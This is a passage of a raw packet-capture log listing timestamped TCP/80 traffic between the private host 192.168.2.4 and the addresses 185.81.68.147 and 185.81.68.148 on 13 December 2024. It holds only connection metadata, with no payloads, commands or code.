Dec 13, 2024 07:47:47.377701044 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377721071 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377741098 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377757072 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377778053 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377794981 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377815008 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377830029 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377852917 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377867937 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377886057 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377903938 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377922058 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377938986 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377959967 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377978086 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.377995968 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378015041 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378036022 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378060102 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378077984 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378094912 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378114939 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378154039 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378154039 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378171921 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378209114 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378223896 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378252983 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378276110 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378297091 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378318071 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378341913 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378362894 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378385067 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378405094 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378427982 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378447056 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378468990 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378489017 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378509998 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378530025 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378551960 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378576040 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378598928 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378617048 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378638983 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378662109 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378686905 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378707886 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378730059 CET	49773	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:47.378751040 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378751040 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378770113 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378791094 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378813028 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378833055 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378855944 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378879070 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378902912 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378926992 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378947020 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378971100 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.378993034 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379018068 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379040003 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379062891 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379082918 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379103899 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379137039 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379156113 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379182100 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379209042 CET	49779	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:47.379223108 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379241943 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379266977 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379291058 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379318953 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379338026 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379359007 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379379034 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379400015 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379420042 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379441977 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.379457951 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.431751013 CET	80	49747	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.432035923 CET	80	49778	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.432238102 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432440996 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432492018 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432549000 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432576895 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432611942 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432637930 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432661057 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432682991 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432717085 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432769060 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432769060 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432796955 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432821035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432843924 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432864904 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432887077 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432921886 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432945013 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432966948 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.432987928 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433037043 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433037043 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433063984 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433089018 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433119059 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433142900 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433170080 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433192015 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433214903 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433239937 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433262110 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433299065 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433320045 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433350086 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433371067 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433393002 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433414936 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433444977 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433465958 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433499098 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433523893 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433546066 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433568954 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433592081 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433613062 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433638096 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433664083 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433691025 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433712006 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433741093 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433764935 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433785915 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433809042 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433839083 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433861971 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433886051 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433914900 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433937073 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433958054 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.433986902 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434010029 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434032917 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434055090 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434078932 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434103012 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434127092 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434150934 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434180021 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434201002 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434227943 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434250116 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434277058 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434298038 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434325933 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434349060 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434371948 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434395075 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434422016 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434446096 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434468985 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434497118 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434520006 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434544086 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434567928 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434588909 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434617996 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434639931 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434660912 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434688091 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434715033 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434739113 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434768915 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.434789896 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435010910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435010910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435010910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435010910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435010910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435010910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435069084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435069084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435069084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435069084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435070038 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435113907 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435113907 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435113907 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435152054 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435152054 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435180902 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435205936 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435230017 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435254097 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435276985 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435298920 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435332060 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435362101 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435385942 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435409069 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435431004 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435452938 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435477018 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435498953 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435523033 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435544968 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435581923 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435621977 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435647964 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435672045 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435697079 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435766935 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435880899 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435904026 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435925007 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435957909 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435957909 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.435985088 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436008930 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436038017 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436038017 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436063051 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436085939 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436110020 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436142921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436142921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436167955 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436192036 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436252117 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436281919 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436302900 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436331987 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436356068 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436379910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436400890 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436422110 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436445951 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436472893 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436496973 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436544895 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436570883 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436594009 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436618090 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436646938 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436646938 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436671972 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436721087 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436743975 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436786890 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436815977 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436815977 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436841011 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436862946 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436886072 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436908007 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436928988 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436949968 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.436974049 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437028885 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437100887 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437135935 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437165022 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437186956 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437207937 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437232018 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437261105 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437261105 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437285900 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437326908 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437351942 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437377930 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437403917 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437431097 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437478065 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437508106 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437508106 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437532902 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437577963 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437623024 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437653065 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437653065 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437679052 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437701941 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437773943 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437824965 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437864065 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437894106 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437894106 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437920094 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437948942 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437948942 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.437974930 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438004017 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438004971 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438030005 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438054085 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438083887 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438083887 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438108921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438136101 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438164949 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438165903 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438190937 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438220978 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438220978 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438247919 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438277006 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438277960 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438303947 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438333035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438333035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438358068 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438383102 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438416958 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438417912 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438441992 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438466072 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438489914 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438519001 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438519001 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438544035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438568115 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438596010 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438596964 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438621998 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438646078 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438674927 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438674927 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438699961 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438720942 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438744068 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438771963 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438772917 CET	49778	80	192.168.2.4	185.81.68.148
